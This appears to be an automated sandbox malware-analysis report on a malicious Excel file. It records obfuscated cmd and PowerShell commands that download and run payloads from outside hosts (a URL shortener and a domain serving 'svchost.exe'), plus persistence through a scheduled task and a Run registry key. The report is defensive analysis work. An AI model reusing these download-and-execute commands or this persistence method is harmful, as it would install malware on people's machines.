Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
Source: unknown	Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;'	Jump to behavior

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;			Jump to behavior

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\ps.exe

Code function: 27_2_004F1750 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,

27_2_004F1750

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_000007FF002606FD pushad ; ret	7_2_000007FF00260741
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_00E7B93E push es; ret	24_2_00E7B9B3
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_0029887D push esp; retf	24_2_0029887E
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_00296AB5 push esp; retf	24_2_00296AB6
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_002994C1 push esp; retf	24_2_002994C2
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_00297F27 push esp; ret	24_2_00297F51
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_00297F58 pushad ; ret	24_2_00297F75
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_004A721B push ecx; retf	24_2_004A721C
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_00AF11AA push cs; retf	24_2_00AF1FE4
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00480FEB push eax; mov dword ptr [esp], 00401500h	27_2_00481022
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00480FEB push edx; mov dword ptr [esp], 0040150Eh	27_2_00481045
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_0041E390 push eax; mov dword ptr [esp], esi	27_2_0041E433
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_0041E560 push edx; mov dword ptr [esp], ebp	27_2_0041E748
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_004019C9 push edx; mov dword ptr [esp], eax	27_2_00401BED
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_004019C9 push ecx; mov dword ptr [esp], eax	27_2_00401BF9
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00401D0B push eax; mov dword ptr [esp], esi	27_2_00401DE4
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00401ED2 push edx; mov dword ptr [esp], 00000064h	27_2_004020C2
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00401ED2 push ecx; mov dword ptr [esp], edi	27_2_004020D0
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00401ED2 push eax; mov dword ptr [esp], esi	27_2_004020E4
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00401ED2 push edi; mov dword ptr [esp], 00000064h	27_2_004021AD
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00401ED2 push eax; mov dword ptr [esp], esi	27_2_004021B7
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00E7B93E push es; ret	27_2_00E7B9B3
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_0023B93E push es; ret	32_2_0023B9B3
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_0020887D push esp; retf	32_2_0020887E
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_00208158 push esp; ret	32_2_00208159
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_00207A76 push esp; ret	32_2_00207F51
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_00206AB5 push esp; retf	32_2_00206AB6
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_002094C1 push esp; retf	32_2_002094C2
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_00207EC4 push esp; ret	32_2_00207F51
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_003C721B push ecx; retf	32_2_003C721C
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 35_2_0023B93E push es; ret	35_2_0023B9B3

Source: initial sample	Static PE information: section name: .text entropy: 7.92184485792
Source: initial sample	Static PE information: section name: .text entropy: 7.92184485792
Source: initial sample	Static PE information: section name: .text entropy: 7.92184485792

Persistence and Installation Behavior:

Drops PE files with benign system names

Source: C:\Users\user\AppData\Local\Temp\ps.exe

File created: C:\Users\user\AppData\Roaming\svchost.exe

Jump to dropped file

Tries to download and execute files (via powershell)

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;			Jump to behavior

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\ps.exe	File created: C:\Users\user\AppData\Roaming\svchost.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\ps.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ps.exe	File created: C:\Users\user\AppData\Roaming\GvthaHtVzpRh.exe	Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp'

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Microsoft
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Microsoft

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
